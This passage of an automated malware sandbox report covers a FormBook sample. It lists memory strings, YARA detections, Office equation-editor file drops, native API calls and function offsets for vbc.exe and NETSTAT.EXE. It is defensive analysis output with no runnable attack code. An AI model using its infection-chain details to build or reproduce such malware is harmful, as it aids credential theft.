Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.sogou.com/
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.sogou.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.soso.com/
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.soso.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.t-online.de/favicon.ico
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.taobao.com/
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.taobao.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.target.com/
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.target.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.tchibo.de/
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.tchibo.de/favicon.ico
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.tesco.com/
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.tesco.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.tiscali.it/favicon.ico
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.univision.com/
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.univision.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.walmart.com/
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.walmart.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.ya.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.yam.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www3.fnac.com/
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www3.fnac.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&amp;Version=2008-06-26&amp;Operation
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://z.about.com/m/a08.ico
Source: vbc.exe, 00000004.00000002.2181434763.0000000002301000.00000004.00000001.sdmp String found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css

E-Banking Fraud:

barindex
Yara detected FormBook
Source: Yara match File source: 00000006.00000002.2216127314.0000000000240000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2218086639.0000000000590000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2181972415.0000000003309000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2380061864.0000000000480000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2216903843.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2380005232.0000000000360000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2379844728.00000000000C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 6.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.3453630.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.34a8450.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE

System Summary:

barindex
Malicious sample detected (through community Yara rule)
Source: 00000006.00000002.2216127314.0000000000240000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.2216127314.0000000000240000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.2218086639.0000000000590000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.2218086639.0000000000590000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.2181972415.0000000003309000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.2181972415.0000000003309000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.2380061864.0000000000480000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.2380061864.0000000000480000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.2216903843.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.2216903843.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.2380005232.0000000000360000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.2380005232.0000000000360000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.2379844728.00000000000C0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.2379844728.00000000000C0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 6.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 6.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.vbc.exe.3453630.4.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.2.vbc.exe.3453630.4.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.vbc.exe.34a8450.5.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.2.vbc.exe.34a8450.5.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 6.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 6.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
.NET source code contains very large strings
Source: svchost[1].2.dr, frmRazor.cs Long String: Length: 13656
Source: 4.2.vbc.exe.cf0000.2.unpack, frmRazor.cs Long String: Length: 13656
Source: 4.0.vbc.exe.cf0000.0.unpack, frmRazor.cs Long String: Length: 13656
Source: 5.0.vbc.exe.cf0000.0.unpack, frmRazor.cs Long String: Length: 13656
Source: 5.2.vbc.exe.cf0000.0.unpack, frmRazor.cs Long String: Length: 13656
Source: 6.0.vbc.exe.cf0000.0.unpack, frmRazor.cs Long String: Length: 13656
Source: 6.2.vbc.exe.cf0000.4.unpack, frmRazor.cs Long String: Length: 13656
Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\svchost[1] Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Users\Public\vbc.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE Memory allocated: 76D20000 page execute and read and write Jump to behavior
Contains functionality to call native functions
Source: C:\Users\Public\vbc.exe Code function: 6_2_00419D60 NtCreateFile, 6_2_00419D60
Source: C:\Users\Public\vbc.exe Code function: 6_2_00419E10 NtReadFile, 6_2_00419E10
Source: C:\Users\Public\vbc.exe Code function: 6_2_00419E90 NtClose, 6_2_00419E90
Source: C:\Users\Public\vbc.exe Code function: 6_2_00419F40 NtAllocateVirtualMemory, 6_2_00419F40
Source: C:\Users\Public\vbc.exe Code function: 6_2_00419D62 NtCreateFile, 6_2_00419D62
Source: C:\Users\Public\vbc.exe Code function: 6_2_00419D1C NtCreateFile, 6_2_00419D1C
Source: C:\Users\Public\vbc.exe Code function: 6_2_00419DB2 NtReadFile, 6_2_00419DB2
Source: C:\Users\Public\vbc.exe Code function: 6_2_00419E0A NtReadFile, 6_2_00419E0A
Source: C:\Users\Public\vbc.exe Code function: 6_2_009500C4 NtCreateFile,LdrInitializeThunk, 6_2_009500C4
Source: C:\Users\Public\vbc.exe Code function: 6_2_00950048 NtProtectVirtualMemory,LdrInitializeThunk, 6_2_00950048
Source: C:\Users\Public\vbc.exe Code function: 6_2_00950078 NtResumeThread,LdrInitializeThunk, 6_2_00950078
Source: C:\Users\Public\vbc.exe Code function: 6_2_0094F9F0 NtClose,LdrInitializeThunk, 6_2_0094F9F0
Source: C:\Users\Public\vbc.exe Code function: 6_2_0094F900 NtReadFile,LdrInitializeThunk, 6_2_0094F900
Source: C:\Users\Public\vbc.exe Code function: 6_2_0094FAD0 NtAllocateVirtualMemory,LdrInitializeThunk, 6_2_0094FAD0
Source: C:\Users\Public\vbc.exe Code function: 6_2_0094FAE8 NtQueryInformationProcess,LdrInitializeThunk, 6_2_0094FAE8
Source: C:\Users\Public\vbc.exe Code function: 6_2_0094FBB8 NtQueryInformationToken,LdrInitializeThunk, 6_2_0094FBB8
Source: C:\Users\Public\vbc.exe Code function: 6_2_0094FB68 NtFreeVirtualMemory,LdrInitializeThunk, 6_2_0094FB68
Source: C:\Users\Public\vbc.exe Code function: 6_2_0094FC90 NtUnmapViewOfSection,LdrInitializeThunk, 6_2_0094FC90
Source: C:\Users\Public\vbc.exe Code function: 6_2_0094FC60 NtMapViewOfSection,LdrInitializeThunk, 6_2_0094FC60
Source: C:\Users\Public\vbc.exe Code function: 6_2_0094FD8C NtDelayExecution,LdrInitializeThunk, 6_2_0094FD8C
Source: C:\Users\Public\vbc.exe Code function: 6_2_0094FDC0 NtQuerySystemInformation,LdrInitializeThunk, 6_2_0094FDC0
Source: C:\Users\Public\vbc.exe Code function: 6_2_0094FEA0 NtReadVirtualMemory,LdrInitializeThunk, 6_2_0094FEA0
Source: C:\Users\Public\vbc.exe Code function: 6_2_0094FED0 NtAdjustPrivilegesToken,LdrInitializeThunk, 6_2_0094FED0
Source: C:\Users\Public\vbc.exe Code function: 6_2_0094FFB4 NtCreateSection,LdrInitializeThunk, 6_2_0094FFB4
Source: C:\Users\Public\vbc.exe Code function: 6_2_009510D0 NtOpenProcessToken, 6_2_009510D0
Source: C:\Users\Public\vbc.exe Code function: 6_2_00950060 NtQuerySection, 6_2_00950060
Source: C:\Users\Public\vbc.exe Code function: 6_2_009501D4 NtSetValueKey, 6_2_009501D4
Source: C:\Users\Public\vbc.exe Code function: 6_2_0095010C NtOpenDirectoryObject, 6_2_0095010C
Source: C:\Users\Public\vbc.exe Code function: 6_2_00951148 NtOpenThread, 6_2_00951148
Source: C:\Users\Public\vbc.exe Code function: 6_2_009507AC NtCreateMutant, 6_2_009507AC
Source: C:\Users\Public\vbc.exe Code function: 6_2_0094F8CC NtWaitForSingleObject, 6_2_0094F8CC
Source: C:\Users\Public\vbc.exe Code function: 6_2_00951930 NtSetContextThread, 6_2_00951930
Source: C:\Users\Public\vbc.exe Code function: 6_2_0094F938 NtWriteFile, 6_2_0094F938
Source: C:\Users\Public\vbc.exe Code function: 6_2_0094FAB8 NtQueryValueKey, 6_2_0094FAB8
Source: C:\Users\Public\vbc.exe Code function: 6_2_0094FA20 NtQueryInformationFile, 6_2_0094FA20
Source: C:\Users\Public\vbc.exe Code function: 6_2_0094FA50 NtEnumerateValueKey, 6_2_0094FA50
Source: C:\Users\Public\vbc.exe Code function: 6_2_0094FBE8 NtQueryVirtualMemory, 6_2_0094FBE8
Source: C:\Users\Public\vbc.exe Code function: 6_2_0094FB50 NtCreateKey, 6_2_0094FB50
Source: C:\Users\Public\vbc.exe Code function: 6_2_0094FC30 NtOpenProcess, 6_2_0094FC30
Source: C:\Users\Public\vbc.exe Code function: 6_2_00950C40 NtGetContextThread, 6_2_00950C40
Source: C:\Users\Public\vbc.exe Code function: 6_2_0094FC48 NtSetInformationFile, 6_2_0094FC48
Source: C:\Users\Public\vbc.exe Code function: 6_2_00951D80 NtSuspendThread, 6_2_00951D80
Source: C:\Users\Public\vbc.exe Code function: 6_2_0094FD5C NtEnumerateKey, 6_2_0094FD5C
Source: C:\Users\Public\vbc.exe Code function: 6_2_0094FE24 NtWriteVirtualMemory, 6_2_0094FE24
Source: C:\Users\Public\vbc.exe Code function: 6_2_0094FFFC NtCreateProcessEx, 6_2_0094FFFC
Source: C:\Users\Public\vbc.exe Code function: 6_2_0094FF34 NtQueueApcThread, 6_2_0094FF34
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D9862 NtQueryInformationProcess,RtlWow64SuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,NtClose, 6_2_003D9862
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D9DAE NtResumeThread,NtClose, 6_2_003D9DAE
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_021D00C4 NtCreateFile,LdrInitializeThunk, 8_2_021D00C4
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_021D07AC NtCreateMutant,LdrInitializeThunk, 8_2_021D07AC
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_021CFAB8 NtQueryValueKey,LdrInitializeThunk, 8_2_021CFAB8
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_021CFAD0 NtAllocateVirtualMemory,LdrInitializeThunk, 8_2_021CFAD0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_021CFAE8 NtQueryInformationProcess,LdrInitializeThunk, 8_2_021CFAE8
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_021CFB50 NtCreateKey,LdrInitializeThunk, 8_2_021CFB50
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_021CFB68 NtFreeVirtualMemory,LdrInitializeThunk, 8_2_021CFB68
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_021CFBB8 NtQueryInformationToken,LdrInitializeThunk, 8_2_021CFBB8
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_021CF900 NtReadFile,LdrInitializeThunk, 8_2_021CF900
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_021CF9F0 NtClose,LdrInitializeThunk, 8_2_021CF9F0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_021CFED0 NtAdjustPrivilegesToken,LdrInitializeThunk, 8_2_021CFED0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_021CFFB4 NtCreateSection,LdrInitializeThunk, 8_2_021CFFB4
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_021CFC60 NtMapViewOfSection,LdrInitializeThunk, 8_2_021CFC60
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_021CFD8C NtDelayExecution,LdrInitializeThunk, 8_2_021CFD8C
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_021CFDC0 NtQuerySystemInformation,LdrInitializeThunk, 8_2_021CFDC0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_021D0048 NtProtectVirtualMemory, 8_2_021D0048
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_021D0078 NtResumeThread, 8_2_021D0078
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_021D0060 NtQuerySection, 8_2_021D0060
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_021D10D0 NtOpenProcessToken, 8_2_021D10D0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_021D010C NtOpenDirectoryObject, 8_2_021D010C
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_021D1148 NtOpenThread, 8_2_021D1148
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_021D01D4 NtSetValueKey, 8_2_021D01D4
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_021CFA20 NtQueryInformationFile, 8_2_021CFA20
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_021CFA50 NtEnumerateValueKey, 8_2_021CFA50
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_021CFBE8 NtQueryVirtualMemory, 8_2_021CFBE8
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_021CF8CC NtWaitForSingleObject, 8_2_021CF8CC
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_021CF938 NtWriteFile, 8_2_021CF938
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_021D1930 NtSetContextThread, 8_2_021D1930
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_021CFE24 NtWriteVirtualMemory, 8_2_021CFE24
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_021CFEA0 NtReadVirtualMemory, 8_2_021CFEA0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_021CFF34 NtQueueApcThread, 8_2_021CFF34
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_021CFFFC NtCreateProcessEx, 8_2_021CFFFC
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_021CFC30 NtOpenProcess, 8_2_021CFC30
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_021CFC48 NtSetInformationFile, 8_2_021CFC48
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_021D0C40 NtGetContextThread, 8_2_021D0C40
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_021CFC90 NtUnmapViewOfSection, 8_2_021CFC90
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_021CFD5C NtEnumerateKey, 8_2_021CFD5C
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_021D1D80 NtSuspendThread, 8_2_021D1D80
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_000D9D60 NtCreateFile, 8_2_000D9D60
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_000D9E10 NtReadFile, 8_2_000D9E10
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_000D9E90 NtClose, 8_2_000D9E90
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_000D9F40 NtAllocateVirtualMemory, 8_2_000D9F40
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_000D9D1C NtCreateFile, 8_2_000D9D1C
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_000D9D62 NtCreateFile, 8_2_000D9D62
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_000D9DB2 NtReadFile, 8_2_000D9DB2
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_000D9E0A NtReadFile, 8_2_000D9E0A
Detected potential crypto function
Source: C:\Users\Public\vbc.exe Code function: 4_2_003B7188 4_2_003B7188
Source: C:\Users\Public\vbc.exe Code function: 4_2_003B4388 4_2_003B4388
Source: C:\Users\Public\vbc.exe Code function: 4_2_003B5C80 4_2_003B5C80
Source: C:\Users\Public\vbc.exe Code function: 4_2_003B6F60 4_2_003B6F60
Source: C:\Users\Public\vbc.exe Code function: 4_2_003B8DA0 4_2_003B8DA0
Source: C:\Users\Public\vbc.exe Code function: 4_2_008973A8 4_2_008973A8
Source: C:\Users\Public\vbc.exe Code function: 4_2_00896560 4_2_00896560
Source: C:\Users\Public\vbc.exe Code function: 4_2_00896008 4_2_00896008
Source: C:\Users\Public\vbc.exe Code function: 4_2_00897DB1 4_2_00897DB1
Source: C:\Users\Public\vbc.exe Code function: 6_2_00401030 6_2_00401030
Source: C:\Users\Public\vbc.exe Code function: 6_2_0041E212 6_2_0041E212
Source: C:\Users\Public\vbc.exe Code function: 6_2_0041D306 6_2_0041D306
Source: C:\Users\Public\vbc.exe Code function: 6_2_00402D90 6_2_00402D90
Source: C:\Users\Public\vbc.exe Code function: 6_2_0041E5B7 6_2_0041E5B7
Source: C:\Users\Public\vbc.exe Code function: 6_2_0041E5BA 6_2_0041E5BA
Source: C:\Users\Public\vbc.exe Code function: 6_2_00409E40 6_2_00409E40
Source: C:\Users\Public\vbc.exe Code function: 6_2_00409E3B 6_2_00409E3B
Source: C:\Users\Public\vbc.exe Code function: 6_2_0041CFA6 6_2_0041CFA6
Source: C:\Users\Public\vbc.exe Code function: 6_2_00402FB0 6_2_00402FB0
Source: C:\Users\Public\vbc.exe Code function: 6_2_0095E0C6 6_2_0095E0C6
Source: C:\Users\Public\vbc.exe Code function: 6_2_0098D005 6_2_0098D005
Source: C:\Users\Public\vbc.exe Code function: 6_2_0097905A 6_2_0097905A
Source: C:\Users\Public\vbc.exe Code function: 6_2_00963040 6_2_00963040
Source: C:\Users\Public\vbc.exe Code function: 6_2_0095E2E9 6_2_0095E2E9
Source: C:\Users\Public\vbc.exe Code function: 6_2_00A01238 6_2_00A01238
Source: C:\Users\Public\vbc.exe Code function: 6_2_00A063BF 6_2_00A063BF
Source: C:\Users\Public\vbc.exe Code function: 6_2_009863DB 6_2_009863DB
Source: C:\Users\Public\vbc.exe Code function: 6_2_0095F3CF 6_2_0095F3CF
Source: C:\Users\Public\vbc.exe Code function: 6_2_00962305 6_2_00962305
Source: C:\Users\Public\vbc.exe Code function: 6_2_00967353 6_2_00967353
Source: C:\Users\Public\vbc.exe Code function: 6_2_009AA37B 6_2_009AA37B
Source: C:\Users\Public\vbc.exe Code function: 6_2_00995485 6_2_00995485
Source: C:\Users\Public\vbc.exe Code function: 6_2_00971489 6_2_00971489
Source: C:\Users\Public\vbc.exe Code function: 6_2_0099D47D 6_2_0099D47D
Source: C:\Users\Public\vbc.exe Code function: 6_2_0097C5F0 6_2_0097C5F0
Source: C:\Users\Public\vbc.exe Code function: 6_2_0096351F 6_2_0096351F
Source: C:\Users\Public\vbc.exe Code function: 6_2_009A6540 6_2_009A6540
Source: C:\Users\Public\vbc.exe Code function: 6_2_00964680 6_2_00964680
Source: C:\Users\Public\vbc.exe Code function: 6_2_0096E6C1 6_2_0096E6C1
Source: C:\Users\Public\vbc.exe Code function: 6_2_00A02622 6_2_00A02622
Source: C:\Users\Public\vbc.exe Code function: 6_2_009AA634 6_2_009AA634
Source: C:\Users\Public\vbc.exe Code function: 6_2_009E579A 6_2_009E579A
Source: C:\Users\Public\vbc.exe Code function: 6_2_0096C7BC 6_2_0096C7BC
Source: C:\Users\Public\vbc.exe Code function: 6_2_009957C3 6_2_009957C3
Source: C:\Users\Public\vbc.exe Code function: 6_2_009FF8EE 6_2_009FF8EE
Source: C:\Users\Public\vbc.exe Code function: 6_2_0096C85C 6_2_0096C85C
Source: C:\Users\Public\vbc.exe Code function: 6_2_0098286D 6_2_0098286D
Source: C:\Users\Public\vbc.exe Code function: 6_2_009629B2 6_2_009629B2
Source: C:\Users\Public\vbc.exe Code function: 6_2_00A0098E 6_2_00A0098E
Source: C:\Users\Public\vbc.exe Code function: 6_2_009769FE 6_2_009769FE
Source: C:\Users\Public\vbc.exe Code function: 6_2_009E5955 6_2_009E5955
Source: C:\Users\Public\vbc.exe Code function: 6_2_00A13A83 6_2_00A13A83
Source: C:\Users\Public\vbc.exe Code function: 6_2_00A0CBA4 6_2_00A0CBA4
Source: C:\Users\Public\vbc.exe Code function: 6_2_0095FBD7 6_2_0095FBD7
Source: C:\Users\Public\vbc.exe Code function: 6_2_009EDBDA 6_2_009EDBDA
Source: C:\Users\Public\vbc.exe Code function: 6_2_00987B00 6_2_00987B00
Source: C:\Users\Public\vbc.exe Code function: 6_2_009FFDDD 6_2_009FFDDD
Source: C:\Users\Public\vbc.exe Code function: 6_2_00990D3B 6_2_00990D3B
Source: C:\Users\Public\vbc.exe Code function: 6_2_0096CD5B 6_2_0096CD5B
Source: C:\Users\Public\vbc.exe Code function: 6_2_00992E2F 6_2_00992E2F
Source: C:\Users\Public\vbc.exe Code function: 6_2_0097EE4C 6_2_0097EE4C
Source: C:\Users\Public\vbc.exe Code function: 6_2_009FCFB1 6_2_009FCFB1
Source: C:\Users\Public\vbc.exe Code function: 6_2_00970F3F 6_2_00970F3F
Source: C:\Users\Public\vbc.exe Code function: 6_2_0098DF7C 6_2_0098DF7C
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D9862 6_2_003D9862
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D1072 6_2_003D1072
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D1069 6_2_003D1069
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D8132 6_2_003D8132
Source: C:\Users\Public\vbc.exe Code function: 6_2_003DAA32 6_2_003DAA32
Source: C:\Users\Public\vbc.exe Code function: 6_2_003DDA6F 6_2_003DDA6F
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D5B22 6_2_003D5B22
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D5B1F 6_2_003D5B1F
Source: C:\Users\Public\vbc.exe Code function: 6_2_003DDB0E 6_2_003DDB0E
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D2CF2 6_2_003D2CF2
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D2CEC 6_2_003D2CEC
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02281238 8_2_02281238
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_021DE2E9 8_2_021DE2E9
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_021E2305 8_2_021E2305
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_021E7353 8_2_021E7353
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_0222A37B 8_2_0222A37B
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_021DF3CF 8_2_021DF3CF
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_022063DB 8_2_022063DB
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_0220D005 8_2_0220D005
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_021F905A 8_2_021F905A
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_021E3040 8_2_021E3040
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_021DE0C6 8_2_021DE0C6
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02282622 8_2_02282622
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_021E4680 8_2_021E4680
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_021EE6C1 8_2_021EE6C1
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_021EC7BC 8_2_021EC7BC
